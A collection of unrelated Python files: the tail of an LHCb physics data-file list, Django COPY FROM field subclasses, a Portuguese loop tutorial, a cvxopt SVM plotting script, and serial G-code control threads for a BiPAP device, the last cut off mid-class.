'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039147_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001548_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055133_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058624_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025748_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019179_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064221_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018376_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031019_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052147_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031587_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010385_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000416_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007189_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014349_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022126_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002824_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051186_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048957_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005382_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052141_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053313_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019796_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010811_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036734_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029966_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066582_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068872_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005985_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036219_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067037_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051574_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045999_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005011_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043305_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001618_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020762_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038139_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030879_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058913_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055589_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043486_1.semileptonic.dst',
], clear=True)
|
python
|
"""
Customized Django model field subclasses
"""
from django.db import models
from django.db.models import fields
from django.db.models.fields.related import ManyToManyField
class CopyFromFieldMixin(fields.Field):
"""
Mixin to add attrs related to COPY FROM command to model fields.
"""
def __init__(self, *args, **kwargs):
self.source_column = kwargs.pop('source_column', None)
super().__init__(*args, **kwargs)
@property
def copy_from_name(self):
"""
Return the name of field to use in COPY FROM command.
"""
return self.source_column or self.column
class CopyFromBigIntegerField(fields.BigIntegerField, CopyFromFieldMixin):
"""
BigIntegerField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromBooleanField(fields.BooleanField, CopyFromFieldMixin):
"""
BooleanField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromCharField(fields.CharField, CopyFromFieldMixin):
"""
CharField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromDateField(fields.DateField, CopyFromFieldMixin):
"""
DateField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromDateTimeField(fields.DateTimeField, CopyFromFieldMixin):
"""
DateTimeField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromDecimalField(fields.DecimalField, CopyFromFieldMixin):
"""
DecimalField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromEmailField(fields.EmailField, CopyFromFieldMixin):
"""
EmailField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromFloatField(fields.FloatField, CopyFromFieldMixin):
"""
FloatField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromForeignKey(models.ForeignKey, CopyFromFieldMixin):
"""
ForeignKey subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromIntegerField(fields.IntegerField, CopyFromFieldMixin):
"""
IntegerField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromOneToOneField(models.OneToOneField, CopyFromFieldMixin):
"""
OneToOneField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromTextField(fields.TextField, CopyFromFieldMixin):
"""
TextField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromURLField(fields.URLField, CopyFromFieldMixin):
"""
URLField subclass with attrs related to COPY FROM command.
"""
pass
class CopyFromManyToManyField(ManyToManyField, CopyFromFieldMixin):
"""
ManyToManyField subclass with attrs related to COPY FROM command.
"""
pass
|
python
|
# Aula de estrutura de repetição com variavel de controle
for c in range(0, 6):
print('oi')
print('fim')
for a in range(0, 10, 2): # o primeiro argumento e o segundo é o range de contagem, o terceiro é o metodo da contagem
print(a)
print('fim')
# Outro exemplo
for a in range(10, 0, -1): # Com uma condição de contagem regressiva
print(a)
print('Fim')
# Utilizando input
n = int(input('Numero: '))
for c in range(0, n+1):
print(c)
print('fim')
s = 0
for c in range(0, 4):
n = int(input('Digite um numero'))
s += n # Esta sintaxe s += n significa s = s + n, python permite esse tipo de apontamento
print(s)
|
python
|
from __future__ import print_function
from matplotlib import rc
rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
## for Palatino and other serif fonts use:
#rc('font',**{'family':'serif','serif':['Palatino']})
#rc('text', usetex=True)
# generate data
# list of points
from matplotlib.backends.backend_pdf import PdfPages
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
np.random.seed(22)
means = [[2, 2], [4, 2]]
cov = [[.3, .2], [.2, .3]]
N = 10
X0 = np.random.multivariate_normal(means[0], cov, N)
X1 = np.random.multivariate_normal(means[1], cov, N)
X = np.concatenate((X0.T, X1.T), axis = 1)
y = np.concatenate((np.ones((1, N)), -1*np.ones((1, N))), axis = 1)
# plot points
plt.plot(X0[:, 0], X0[:, 1], 'bs', markersize = 8, alpha = .8)
plt.plot(X1[:, 0], X1[:, 1], 'ro', markersize = 8, alpha = .8)
plt.axis('equal')
# axis limits
plt.ylim(0, 3)
plt.xlim(2, 4)
# hide tikcs
cur_axes = plt.gca()
cur_axes.axes.get_xaxis().set_ticks([])
cur_axes.axes.get_yaxis().set_ticks([])
plt.xlabel('$x_1$', fontsize = 20)
plt.ylabel('$x_2$', fontsize = 20)
# pdf.savefig()
plt.show()
from cvxopt import matrix, solvers
# build K
V = np.concatenate((X0.T, -X1.T), axis = 1)
K = matrix(V.T.dot(V))
p = matrix(-np.ones((2*N, 1)))
# build A, b, G, h
G = matrix(-np.eye(2*N))
h = matrix(np.zeros((2*N, 1)))
A = matrix(y)
b = matrix(np.zeros((1, 1)))
solvers.options['show_progress'] = False
sol = solvers.qp(K, p, G, h, A, b)
l = np.array(sol['x'])
print('lambda = \n', l.T)
S = np.where(l > 1e-6)[0]
VS = V[:, S]
XS = X[:, S]
yS = y[:, S]
lS = l[S]
# calculate w and b
w = VS.dot(lS)
b = np.mean(yS.T - w.T.dot(XS))
print('w = ', w.T)
print('b = ', b)
with PdfPages('svm4.pdf') as pdf:
# draw
# plot points
fig, ax = plt.subplots()
x1 = np.arange(-10, 10, 0.1)
y1 = -w[0, 0]/w[1, 0]*x1 - b/w[1, 0]
y2 = -w[0, 0]/w[1, 0]*x1 - (b-1)/w[1, 0]
y3 = -w[0, 0]/w[1, 0]*x1 - (b+1)/w[1, 0]
plt.plot(x1, y1, 'k', linewidth = 3)
plt.plot(x1, y2, 'k')
plt.plot(x1, y3, 'k')
y4 = 10*x1
plt.plot(x1, y1, 'k')
plt.fill_between(x1, y1, color='red', alpha=0.1)
plt.fill_between(x1, y1, y4, color = 'blue', alpha = 0.1)
plt.plot(X0[:, 0], X0[:, 1], 'bs', markersize = 8, alpha = .8)
plt.plot(X1[:, 0], X1[:, 1], 'ro', markersize = 8, alpha = .8)
plt.axis('equal')
plt.ylim(0, 3)
plt.xlim(2, 4)
# hide tikcs
cur_axes = plt.gca()
cur_axes.axes.get_xaxis().set_ticks([])
cur_axes.axes.get_yaxis().set_ticks([])
# add circles around support vectors
for m in S:
circle = plt.Circle((X[0, m], X[1, m] ), 0.1, color='k', fill = False)
ax.add_artist(circle)
plt.xlabel('$x_1$', fontsize = 20)
plt.ylabel('$x_2$', fontsize = 20)
# plt.savefig('svm4.png', bbox_inches='tight', dpi = 300)
pdf.savefig()
plt.show()
|
python
|
import sys
import serial
import pprint
import time
import enum
import queue
from queue import Queue
from os.path import join, dirname, abspath
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt, QMutex
class GcodeStates(enum.Enum):
WAIT_FOR_TIMEOUT = 1
GCODE_SENT = 2
READY_TO_SEND = 3
class BipapInitializationThread(QObject):
signal = Signal(str)
ppsignal = Signal(list)
def __init__(self, serialPort, codegen, que):
self.pressureque = que
self.serialPort = serialPort
self.position_pressure_list = []
#self.json = JsonSettings("settings.json")
self.codegen = codegen #GcodeGenerator(int(self.json.dict['vt']), int(self.json.dict['rr']), int(self.json.dict['ie']), int(self.json.dict['fio2']))
self.codegen.GenerateCMV()
self.codelist = self.codegen.gcodeinit.splitlines()
self.flagStop = False
self.variableDt = self.codegen.Dt
self.ustr = ""
super().__init__()
def Stop(self):
self.flagStop = True
@Slot()
def run(self):
try:
lst = []
for line in self.codelist:
if self.flagStop:
break
#self.serialPort.reset_input_buffer()
self.serialPort.write((str(line) + "\r\n").encode("utf-8"))
time.sleep(0.5)
in_waiting = self.serialPort.in_waiting
while in_waiting == 0:
time.sleep(1)
in_waiting = self.serialPort.in_waiting
jMessage = ""
while self.serialPort.in_waiting:
#print(self.serialPort.readline().decode('ascii'))
lst = self.serialPort.readlines()
for itm in lst:
try:
jMessage += itm.decode('ascii')
except:
pass
#jMessage += self.serialPort.readline().decode('ascii')
if "busy" in jMessage:
time.sleep(1)
continue
self.signal.emit(str(line) + " - " + jMessage)
while self.variableDt < self.codegen.Dp:
if self.flagStop:
break
try:
self.ustr = "G01 X"+str(self.variableDt) + " Y"+str(self.variableDt)+"\r\n"
self.serialPort.write((self.ustr.encode("utf-8")))
if self.pressureque.qsize() > 0:
self.pressureque.get(False)
time.sleep(0.12)
in_waiting = self.serialPort.in_waiting
#while in_waiting == 0:
#time.sleep(0.1)
#in_waiting = self.serialPort.in_waiting
#self.serialPort.reset_input_buffer()
while self.pressureque.qsize() <= 0:
pass
if self.pressureque.qsize() > 0:
pressure = self.pressureque.get(False)
if "\n" in pressure:
pass
else:
self.position_pressure_list.append([self.variableDt, pressure])
self.variableDt += 1
except serial.SerialException as ex:
print("Error In SerialException During Bipap Pushing" + str(ex.strerror))
self.signal.emit("Endbipapinit")
except Exception as e:
print("Error In Exception During Bipap Pushing")
pprint.pprint(e)
self.signal.emit("Endbipapinit")
self.ppsignal.emit(self.position_pressure_list)
self.ustr = "G01 X"+str(self.codegen.Dt) + " Y"+str(self.codegen.Dt)+"\r\n"
self.serialPort.write((self.ustr.encode("utf-8")))
pprint.pprint(self.position_pressure_list)
print("pressure list from thread")
self.signal.emit("Endbipapinit")
except serial.SerialException as ex:
print("Error In SerialException" + str(ex.strerror))
self.signal.emit("Stopped")
except Exception as e:
print('Error From Bipap run..')
pprint.pprint(e)
self.signal.emit("Stopped")
class PrimaryThread(QObject):
signal = Signal(str)
def __init__(self, serialPort, codegen):
self.serialPort = serialPort
#self.json = JsonSettings("settings.json")
self.codegen = codegen #GcodeGenerator(int(self.json.dict['vt']), int(self.json.dict['rr']), int(self.json.dict['ie']), int(self.json.dict['fio2']))
self.codegen.GenerateCMV()
self.codelist = self.codegen.gcodeprimary.splitlines()
self.flagStop = False
super().__init__()
def Stop(self):
self.flagStop = True
@Slot()
def run(self):
try:
lst = []
for line in self.codelist:
if self.flagStop:
break
#self.serialPort.reset_input_buffer()
self.serialPort.write((str(line) + "\r\n").encode("utf-8"))
time.sleep(0.5)
in_waiting = self.serialPort.in_waiting
while in_waiting == 0:
time.sleep(1)
in_waiting = self.serialPort.in_waiting
jMessage = ""
while self.serialPort.in_waiting:
#print(self.serialPort.readline().decode('ascii'))
lst = self.serialPort.readlines()
for itm in lst:
try:
jMessage += itm.decode('ascii')
except:
pass
#jMessage += self.serialPort.readline().decode('ascii')
if "busy" in jMessage:
time.sleep(1)
continue
self.signal.emit(str(line) + " - " + jMessage)
self.signal.emit("StoppedOK")
except serial.SerialException as ex:
print("Error In SerialException" + ex.strerror)
self.signal.emit("Stopped")
except Exception as e:
pprint.pprint(e)
self.signal.emit("Stopped")
class BipapThread(QObject):
signal = Signal(str)
def __init__(self, serl, codegen, que):
self.pressureque = que
self.serl = serl
self.codegen = codegen
self.codegen.GenerateCMV()
self.codelist = self.codegen.gcodestr.splitlines()
self.linecount = len(self.codelist)
self.flagStop = False
self.pause = True
self.gcode_exec_state = GcodeStates.READY_TO_SEND
self.gcode_move_count = 0
self.presentPosition = (0,0)
self.Tic = 0
self.Toc = 0
self.xyIncr = self.codegen.Dt
self.gstr = ""
self.sremsg = ""
self.serialmutex = QMutex()
self.startdelay = -1
super().__init__()
def gcodestep(self):
self.gstr = "G01 X" + str(self.xyIncr) + " Y" + str(self.xyIncr) + " F1000\r\n"
if self.xyIncr < self.codegen.xmax:
self.xyIncr += 1
def Stop(self):
self.flagStop = True
def updateGcode(self, codegen):
self.codegen = codegen
self.codegen.GenerateCMV()
self.codelist = self.codegen.gcodestr.splitlines()
def StartMoving(self):
self.pause = False
def StartMovingAfter(self, delay):
self.startdelay = delay
def StopMoving(self):
self.pause = True
self.xyIncr = self.codegen.Dt
@Slot()
def run(self):
lst = []
while 1:
if self.flagStop:
break
try:
if not self.pause:
if self.gcode_exec_state == GcodeStates.READY_TO_SEND:
self.gcodestep()
self.serialmutex.lock()
self.serl.write(self.gstr.encode("utf-8"))
self.serialmutex.unlock()
self.gcode_move_count += 1
if self.gcode_move_count >= 130:
#self.pause = True
self.gcode_move_count = 0
else:
self.gcode_exec_state = GcodeStates.WAIT_FOR_TIMEOUT
self.Tic = time.perf_counter()
if self.gcode_exec_state == GcodeStates.WAIT_FOR_TIMEOUT:
if (time.perf_counter() - self.Tic) >= 0.15:
#print("Gcode Executed\r\n")
self.gcode_exec_state = GcodeStates.READY_TO_SEND
elif self.startdelay > 0:
time.sleep(self.startdelay)
self.startdelay = -1
self.pause = False
except serial.SerialException as ex:
print("Error In SerialException" + str(ex.strerror))
class EncoderThread(QObject):
signal_pass_encoder = Signal(str)
def __init__(self, serialport):
self.rec_bytecount = 0
self.line = []
self.rec_data = ""
